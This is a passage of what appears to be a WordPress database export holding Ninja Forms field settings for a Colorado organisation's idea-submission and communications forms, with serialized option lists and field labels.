Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8410,96,'field_label','Text','field_label','Text'),(8411,96,'field_key','html_18','field_key','html_18'),(8412,96,'drawerDisabled','','drawerDisabled',''),(8413,97,'field_label','First Name','field_label','First Name'),(8414,97,'field_key','textbox_6','field_key','textbox_6'),(8415,97,'custom_name_attribute','','custom_name_attribute',''),(8416,97,'personally_identifiable','','personally_identifiable',''),(2596,83,'key','listselect_243','key','listselect_243'),(2597,83,'container_class','one-half first','container_class','one-half first'),(2598,83,'parent_id','9','parent_id','9'),(2599,84,'objectType','Field','objectType','Field'),(2600,84,'objectDomain','fields','objectDomain','fields'),(2601,84,'editActive','','editActive',''),(2602,84,'order','7','order','7'),(2603,84,'type','hr','type','hr'),(2604,84,'label','hr','label','hr'),(2605,84,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2606,84,'show_desc','0','show_desc','0'),(2607,84,'desc_pos','none','desc_pos','none'),(2608,84,'desc_text','','desc_text',''),(2609,84,'element_class','','element_class',''),(2610,84,'key','hr_244','key','hr_244'),(2611,84,'container_class','','container_class',''),(2612,84,'parent_id','9','parent_id','9'),(2613,85,'objectType','Field','objectType','Field'),(2614,85,'objectDomain','fields','objectDomain','fields'),(2615,85,'editActive','','editActive',''),(2616,85,'order','8','order','8'),(2617,85,'type','html','type','html'),(2618,85,'label','What Is Your Idea?','label','What Is Your Idea?'),(2619,85,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2620,85,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">What Is Your Idea?</span></span></span></strong></span></h3>\r\n','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">What Is Your Idea?</span></span></span></strong></span></h3>\r\n'),(2621,85,'desc_el','div','desc_el','div'),(2622,85,'show_desc','0','show_desc','0'),(2623,85,'desc_pos','none','desc_pos','none'),(2624,85,'desc_text','','desc_text',''),(2625,85,'element_class','','element_class',''),(2626,85,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">What Is Your Idea?</span></span></span></strong></span></h3>\r\n','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">What Is Your Idea?</span></span></span></strong></span></h3>\r\n'),(2627,85,'key','html_245','key','html_245'),(2628,85,'container_class','','container_class',''),(2629,85,'parent_id','9','parent_id','9'),(2630,86,'objectType','Field','objectType','Field'),(2631,86,'objectDomain','fields','objectDomain','fields'),(2632,86,'editActive','','editActive',''),(2633,86,'order','9','order','9'),(2634,86,'type','textbox','type','textbox'),(2635,86,'label',' Give Your Idea A Title','label',' Give Your Idea A Title'),(2636,86,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2637,86,'label_pos','above','label_pos','above'),(2638,86,'placeholder','','placeholder',''),(2639,86,'first_name','','first_name',''),(2640,86,'last_name','','last_name',''),(2641,86,'user_address_1','','user_address_1',''),(2642,86,'user_address_2','','user_address_2',''),(2643,86,'user_city','','user_city',''),(2644,86,'user_zip','','user_zip',''),(2645,86,'user_phone','','user_phone',''),(2646,86,'user_email','','user_email',''),(2647,86,'user_info_field_group','1','user_info_field_group','1'),(2648,86,'disable_input','0','disable_input','0'),(2649,86,'mask','','mask',''),(2650,86,'input_limit','','input_limit',''),(2651,86,'input_limit_type','char','input_limit_type','char'),(2652,86,'calc_auto_include','0','calc_auto_include','0'),(2653,86,'datepicker','0','datepicker','0'),(2654,86,'user_state','0','user_state','0'),(2655,86,'autocomplete_off','0','autocomplete_off','0'),(2656,86,'num_sort','0','num_sort','0'),(2657,86,'admin_label','','admin_label',''),(2658,86,'user_info_field_group_name','','user_info_field_group_name',''),(2659,86,'user_info_field_group_custom','','user_info_field_group_custom',''),(2660,86,'show_help','0','show_help','0'),(2661,86,'help_text','','help_text',''),(2662,86,'show_desc','0','show_desc','0'),(2663,86,'desc_pos','none','desc_pos','none'),(2664,86,'desc_text','','desc_text',''),(2665,86,'element_class','','element_class',''),(2666,86,'required','1','required','1'),(2667,86,'key','textbox_256','key','textbox_256'),(2668,86,'default','','default',''),(2669,86,'container_class','','container_class',''),(2670,86,'manual_key','','manual_key',''),(2671,86,'custom_mask','','custom_mask',''),(2672,86,'parent_id','9','parent_id','9'),(2673,87,'objectType','Field','objectType','Field'),(2674,87,'objectDomain','fields','objectDomain','fields'),(2675,87,'editActive','','editActive',''),(2676,87,'order','10','order','10'),(2677,87,'type','textarea','type','textarea'),(2678,87,'label','Enter The Details of Your Idea','label','Enter The Details of Your Idea'),(2679,87,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2680,87,'label_pos','above','label_pos','above'),(2681,87,'default_value','','default_value',''),(2682,87,'textarea_rte','0','textarea_rte','0'),(2683,87,'textarea_media','0','textarea_media','0'),(2684,87,'disable_rte_mobile','0','disable_rte_mobile','0'),(2685,87,'input_limit','','input_limit',''),(2686,87,'input_limit_type','char','input_limit_type','char'),(2687,87,'calc_auto_include','0','calc_auto_include','0'),(2688,87,'num_sort','0','num_sort','0'),(2689,87,'admin_label','','admin_label',''),(2690,87,'show_help','0','show_help','0'),(2691,87,'help_text','','help_text',''),(2692,87,'show_desc','0','show_desc','0'),(2693,87,'desc_pos','none','desc_pos','none'),(2694,87,'desc_text','','desc_text',''),(2695,87,'element_class','','element_class',''),(2696,87,'required','1','required','1'),(2697,87,'default','','default',''),(2698,87,'key','textarea_253','key','textarea_253'),(2699,87,'placeholder','','placeholder',''),(2700,87,'container_class','','container_class',''),(2701,87,'manual_key','','manual_key',''),(2702,87,'parent_id','9','parent_id','9'),(2703,88,'objectType','Field','objectType','Field'),(2704,88,'objectDomain','fields','objectDomain','fields'),(2705,88,'editActive','','editActive',''),(2706,88,'order','11','order','11'),(2707,88,'type','textbox','type','textbox'),(2708,88,'label','Why Should It Be Done (what is the spiritual purpose?)','label','Why Should It Be Done (what is the spiritual purpose?)'),(2709,88,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2710,88,'label_pos','above','label_pos','above'),(2711,88,'placeholder','','placeholder',''),(2712,88,'first_name','','first_name',''),(2713,88,'last_name','','last_name',''),(2714,88,'user_address_1','','user_address_1',''),(2715,88,'user_address_2','','user_address_2',''),(2716,88,'user_city','','user_city',''),(2717,88,'user_zip','','user_zip',''),(2718,88,'user_phone','','user_phone',''),(2719,88,'user_email','','user_email',''),(2720,88,'user_info_field_group','1','user_info_field_group','1'),(2721,88,'disable_input','0','disable_input','0'),(2722,88,'mask','','mask',''),(2723,88,'input_limit','','input_limit',''),(2724,88,'input_limit_type','char','input_limit_type','char'),(2725,88,'calc_auto_include','0','calc_auto_include','0'),(2726,88,'datepicker','0','datepicker','0'),(2727,88,'user_state','0','user_state','0'),(2728,88,'autocomplete_off','0','autocomplete_off','0'),(2729,88,'num_sort','0','num_sort','0'),(2730,88,'admin_label','','admin_label',''),(2731,88,'user_info_field_group_name','','user_info_field_group_name',''),(2732,88,'user_info_field_group_custom','','user_info_field_group_custom',''),(2733,88,'show_help','0','show_help','0'),(2734,88,'help_text','','help_text',''),(2735,88,'show_desc','0','show_desc','0'),(2736,88,'desc_pos','none','desc_pos','none'),(2737,88,'desc_text','','desc_text',''),(2738,88,'element_class','','element_class',''),(2739,88,'required','1','required','1'),(2740,88,'key','textbox_257','key','textbox_257'),(2741,88,'default','','default',''),(2742,88,'container_class','','container_class',''),(2743,88,'manual_key','','manual_key',''),(2744,88,'custom_mask','','custom_mask',''),(2745,88,'parent_id','9','parent_id','9'),(2746,89,'objectType','Field','objectType','Field'),(2747,89,'objectDomain','fields','objectDomain','fields'),(2748,89,'editActive','','editActive',''),(2749,89,'order','12','order','12'),(2750,89,'type','textbox','type','textbox'),(2751,89,'label','Who Will Do It (you or someone else?)','label','Who Will Do It (you or someone else?)'),(2752,89,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2753,89,'label_pos','above','label_pos','above'),(2754,89,'placeholder','','placeholder',''),(2755,89,'first_name','','first_name',''),(2756,89,'last_name','','last_name',''),(2757,89,'user_address_1','','user_address_1',''),(2758,89,'user_address_2','','user_address_2',''),(2759,89,'user_city','','user_city',''),(2760,89,'user_zip','','user_zip',''),(2761,89,'user_phone','','user_phone',''),(2762,89,'user_email','','user_email',''),(2763,89,'user_info_field_group','1','user_info_field_group','1'),(2764,89,'disable_input','0','disable_input','0'),(2765,89,'mask','','mask',''),(2766,89,'input_limit','','input_limit',''),(2767,89,'input_limit_type','char','input_limit_type','char'),(2768,89,'calc_auto_include','0','calc_auto_include','0'),(2769,89,'datepicker','0','datepicker','0'),(2770,89,'user_state','0','user_state','0'),(2771,89,'autocomplete_off','0','autocomplete_off','0'),(2772,89,'num_sort','0','num_sort','0'),(2773,89,'admin_label','','admin_label',''),(2774,89,'user_info_field_group_name','','user_info_field_group_name',''),(2775,89,'user_info_field_group_custom','','user_info_field_group_custom',''),(2776,89,'show_help','0','show_help','0'),(2777,89,'help_text','','help_text',''),(2778,89,'show_desc','0','show_desc','0'),(2779,89,'desc_pos','none','desc_pos','none'),(2780,89,'desc_text','','desc_text',''),(2781,89,'element_class','','element_class',''),(2782,89,'required','1','required','1'),(2783,89,'key','textbox_258','key','textbox_258'),(2784,89,'default','','default',''),(2785,89,'container_class','','container_class',''),(2786,89,'manual_key','','manual_key',''),(2787,89,'custom_mask','','custom_mask',''),(2788,89,'parent_id','9','parent_id','9'),(2789,90,'objectType','Field','objectType','Field'),(2790,90,'objectDomain','fields','objectDomain','fields'),(2791,90,'editActive','','editActive',''),(2792,90,'order','13','order','13'),(2793,90,'type','textbox','type','textbox'),(2794,90,'label','How Many People Will Be Required To Make This Happen?','label','How Many People Will Be Required To Make This Happen?'),(2795,90,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2796,90,'label_pos','above','label_pos','above'),(2797,90,'placeholder','','placeholder',''),(2798,90,'first_name','','first_name',''),(2799,90,'last_name','','last_name',''),(2800,90,'user_address_1','','user_address_1',''),(2801,90,'user_address_2','','user_address_2',''),(2802,90,'user_city','','user_city',''),(2803,90,'user_zip','','user_zip',''),(2804,90,'user_phone','','user_phone',''),(2805,90,'user_email','','user_email',''),(2806,90,'user_info_field_group','1','user_info_field_group','1'),(2807,90,'disable_input','0','disable_input','0'),(2808,90,'mask','','mask',''),(2809,90,'input_limit','','input_limit',''),(2810,90,'input_limit_type','char','input_limit_type','char'),(2811,90,'calc_auto_include','0','calc_auto_include','0'),(2812,90,'datepicker','0','datepicker','0'),(2813,90,'user_state','0','user_state','0'),(2814,90,'autocomplete_off','0','autocomplete_off','0'),(2815,90,'num_sort','0','num_sort','0'),(2816,90,'admin_label','','admin_label',''),(2817,90,'user_info_field_group_name','','user_info_field_group_name',''),(2818,90,'user_info_field_group_custom','','user_info_field_group_custom',''),(2819,90,'show_help','0','show_help','0'),(2820,90,'help_text','','help_text',''),(2821,90,'show_desc','0','show_desc','0'),(2822,90,'desc_pos','none','desc_pos','none'),(2823,90,'desc_text','','desc_text',''),(2824,90,'element_class','','element_class',''),(2825,90,'required','1','required','1'),(2826,90,'key','textbox_259','key','textbox_259'),(2827,90,'default','','default',''),(2828,90,'container_class','','container_class',''),(2829,90,'manual_key','','manual_key',''),(2830,90,'custom_mask','','custom_mask',''),(2831,90,'parent_id','9','parent_id','9'),(2832,91,'objectType','Field','objectType','Field'),(2833,91,'objectDomain','fields','objectDomain','fields'),(2834,91,'editActive','','editActive',''),(2835,91,'order','14','order','14'),(2836,91,'type','textbox','type','textbox'),(2837,91,'label','When Would This Happen?','label','When Would This Happen?'),(2838,91,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2839,91,'label_pos','above','label_pos','above'),(2840,91,'placeholder','','placeholder',''),(2841,91,'first_name','','first_name',''),(2842,91,'last_name','','last_name',''),(2843,91,'user_address_1','','user_address_1',''),(2844,91,'user_address_2','','user_address_2',''),(2845,91,'user_city','','user_city',''),(2846,91,'user_zip','','user_zip',''),(2847,91,'user_phone','','user_phone',''),(2848,91,'user_email','','user_email',''),(2849,91,'user_info_field_group','1','user_info_field_group','1'),(2850,91,'disable_input','0','disable_input','0'),(2851,91,'mask','','mask',''),(2852,91,'input_limit','','input_limit',''),(2853,91,'input_limit_type','char','input_limit_type','char'),(2854,91,'calc_auto_include','0','calc_auto_include','0'),(2855,91,'datepicker','0','datepicker','0'),(2856,91,'user_state','0','user_state','0'),(2857,91,'autocomplete_off','0','autocomplete_off','0'),(2858,91,'num_sort','0','num_sort','0'),(2859,91,'admin_label','','admin_label',''),(2860,91,'user_info_field_group_name','','user_info_field_group_name',''),(2861,91,'user_info_field_group_custom','','user_info_field_group_custom',''),(2862,91,'show_help','0','show_help','0'),(2863,91,'help_text','','help_text',''),(2864,91,'show_desc','0','show_desc','0'),(2865,91,'desc_pos','none','desc_pos','none'),(2866,91,'desc_text','','desc_text',''),(2867,91,'element_class','','element_class',''),(2868,91,'required','1','required','1'),(2869,91,'key','textbox_263','key','textbox_263'),(2870,91,'default','','default',''),(2871,91,'container_class','','container_class',''),(2872,91,'manual_key','','manual_key',''),(2873,91,'custom_mask','','custom_mask',''),(2874,91,'parent_id','9','parent_id','9'),(2875,92,'objectType','Field','objectType','Field'),(2876,92,'objectDomain','fields','objectDomain','fields'),(2877,92,'editActive','','editActive',''),(2878,92,'order','15','order','15'),(2879,92,'type','textbox','type','textbox'),(2880,92,'label','Where Would This Happen?','label','Where Would This Happen?'),(2881,92,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2882,92,'label_pos','above','label_pos','above'),(2883,92,'placeholder','','placeholder',''),(2884,92,'first_name','','first_name',''),(2885,92,'last_name','','last_name',''),(2886,92,'user_address_1','','user_address_1',''),(2887,92,'user_address_2','','user_address_2',''),(2888,92,'user_city','','user_city',''),(2889,92,'user_zip','','user_zip',''),(2890,92,'user_phone','','user_phone',''),(2891,92,'user_email','','user_email',''),(2892,92,'user_info_field_group','1','user_info_field_group','1'),(2893,92,'disable_input','0','disable_input','0'),(2894,92,'mask','','mask',''),(2895,92,'input_limit','','input_limit',''),(2896,92,'input_limit_type','char','input_limit_type','char'),(2897,92,'calc_auto_include','0','calc_auto_include','0'),(2898,92,'datepicker','0','datepicker','0'),(2899,92,'user_state','0','user_state','0'),(2900,92,'autocomplete_off','0','autocomplete_off','0'),(2901,92,'num_sort','0','num_sort','0'),(2902,92,'admin_label','','admin_label',''),(2903,92,'user_info_field_group_name','','user_info_field_group_name',''),(2904,92,'user_info_field_group_custom','','user_info_field_group_custom',''),(2905,92,'show_help','0','show_help','0'),(2906,92,'help_text','','help_text',''),(2907,92,'show_desc','0','show_desc','0'),(2908,92,'desc_pos','none','desc_pos','none'),(2909,92,'desc_text','','desc_text',''),(2910,92,'element_class','','element_class',''),(2911,92,'required','1','required','1'),(2912,92,'key','textbox_264','key','textbox_264'),(2913,92,'default','','default',''),(2914,92,'container_class','','container_class',''),(2915,92,'manual_key','','manual_key',''),(2916,92,'custom_mask','','custom_mask',''),(2917,92,'parent_id','9','parent_id','9'),(2918,93,'objectType','Field','objectType','Field'),(2919,93,'objectDomain','fields','objectDomain','fields'),(2920,93,'editActive','','editActive',''),(2921,93,'order','16','order','16'),(2922,93,'type','textbox','type','textbox'),(2923,93,'label','What Is The Anticipated Cost To Implement This Idea?','label','What Is The Anticipated Cost To Implement This Idea?'),(2924,93,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2925,93,'label_pos','above','label_pos','above'),(2926,93,'placeholder','','placeholder',''),(2927,93,'first_name','','first_name',''),(2928,93,'last_name','','last_name',''),(2929,93,'user_address_1','','user_address_1',''),(2930,93,'user_address_2','','user_address_2',''),(2931,93,'user_city','','user_city',''),(2932,93,'user_zip','','user_zip',''),(2933,93,'user_phone','','user_phone',''),(2934,93,'user_email','','user_email',''),(2935,93,'user_info_field_group','1','user_info_field_group','1'),(2936,93,'disable_input','0','disable_input','0'),(2937,93,'mask','','mask',''),(2938,93,'input_limit','','input_limit',''),(2939,93,'input_limit_type','char','input_limit_type','char'),(2940,93,'calc_auto_include','0','calc_auto_include','0'),(2941,93,'datepicker','0','datepicker','0'),(2942,93,'user_state','0','user_state','0'),(2943,93,'autocomplete_off','0','autocomplete_off','0'),(2944,93,'num_sort','0','num_sort','0'),(2945,93,'admin_label','','admin_label',''),(2946,93,'user_info_field_group_name','','user_info_field_group_name',''),(2947,93,'user_info_field_group_custom','','user_info_field_group_custom',''),(2948,93,'show_help','0','show_help','0'),(2949,93,'help_text','','help_text',''),(2950,93,'show_desc','0','show_desc','0'),(2951,93,'desc_pos','none','desc_pos','none'),(2952,93,'desc_text','','desc_text',''),(2953,93,'element_class','','element_class',''),(2954,93,'required','1','required','1'),(2955,93,'key','textbox_265','key','textbox_265'),(2956,93,'default','','default',''),(2957,93,'container_class','','container_class',''),(2958,93,'manual_key','','manual_key',''),(2959,93,'custom_mask','','custom_mask',''),(2960,93,'parent_id','9','parent_id','9'),(17572,631,'element_class','','element_class',''),(17571,631,'container_class','','container_class',''),(17570,631,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17569,631,'type','html','type','html'),(17568,631,'label','HTML','label','HTML'),(17567,631,'idAttribute','id','idAttribute','id'),(17566,631,'order','8','order','8'),(2978,95,'objectType','Field','objectType','Field'),(2979,95,'objectDomain','fields','objectDomain','fields'),(2980,95,'editActive','','editActive',''),(2981,95,'order','18','order','18'),(2982,95,'type','submit','type','submit'),(2983,95,'label','Submit','label','Submit'),(2984,95,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(2985,95,'show_help','0','show_help','0'),(2986,95,'help_text','','help_text',''),(2987,95,'show_desc','0','show_desc','0'),(2988,95,'desc_pos','none','desc_pos','none'),(2989,95,'desc_text','','desc_text',''),(2990,95,'processing_label','Processing','processing_label','Processing'),(2991,95,'element_class','','element_class',''),(2992,95,'key','submit_255','key','submit_255'),(2993,95,'container_class','','container_class',''),(2994,95,'parent_id','9','parent_id','9'),(2995,96,'objectType','Field','objectType','Field'),(2996,96,'objectDomain','fields','objectDomain','fields'),(2997,96,'editActive','','editActive',''),(2998,96,'order','1','order','1'),(2999,96,'type','html','type','html'),(3000,96,'label','Text','label','Text'),(3001,96,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3002,96,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado RESA Organization Communications</span></span></span></strong></span></h3>','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado RESA Organization Communications</span></span></span></strong></span></h3>'),(3003,96,'desc_el','div','desc_el','div'),(3004,96,'show_desc','0','show_desc','0'),(3005,96,'desc_pos','none','desc_pos','none'),(3006,96,'desc_text','','desc_text',''),(3007,96,'element_class','','element_class',''),(3008,96,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado RESA Organization Communications</span></span></span></strong></span></h3>','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado RESA Organization Communications</span></span></span></strong></span></h3>'),(3009,96,'key','html_18','key','html_18'),(3010,96,'container_class','','container_class',''),(3011,96,'parent_id','10','parent_id','10'),(3012,97,'objectType','Field','objectType','Field'),(3013,97,'objectDomain','fields','objectDomain','fields'),(3014,97,'editActive','','editActive',''),(3015,97,'order','2','order','2'),(3016,97,'type','textbox','type','textbox'),(3017,97,'def_id','6','def_id','6'),(3018,97,'label','First Name','label','First Name'),(3019,97,'label_pos','above','label_pos','above'),(3020,97,'mask','','mask',''),(3021,97,'datepicker','0','datepicker','0'),(3022,97,'send_email','0','send_email','0'),(3023,97,'from_email','0','from_email','0'),(3024,97,'first_name','1','first_name','1'),(3025,97,'last_name','0','last_name','0'),(3026,97,'from_name','0','from_name','0'),(3027,97,'user_info_field_group','1','user_info_field_group','1'),(3028,97,'show_help','0','show_help','0'),(3029,97,'help_text','','help_text',''),(3030,97,'calc_auto_include','0','calc_auto_include','0'),(3031,97,'calc_option','0','calc_option','0'),(3032,97,'placeholder','','placeholder',''),(3033,97,'user_address_1','','user_address_1',''),(3034,97,'user_address_2','','user_address_2',''),(3035,97,'user_city','','user_city',''),(3036,97,'user_zip','','user_zip',''),(3037,97,'user_phone','','user_phone',''),(3038,97,'user_email','','user_email',''),(3039,97,'disable_input','0','disable_input','0'),(3040,97,'input_limit','','input_limit',''),(3041,97,'input_limit_type','char','input_limit_type','char'),(3042,97,'input_limit_msg','','input_limit_msg',''),(3043,97,'user_state','0','user_state','0'),(3044,97,'autocomplete_off','0','autocomplete_off','0'),(3045,97,'num_sort','0','num_sort','0'),(3046,97,'admin_label','','admin_label',''),(3047,97,'user_info_field_group_name','','user_info_field_group_name',''),(3048,97,'user_info_field_group_custom','','user_i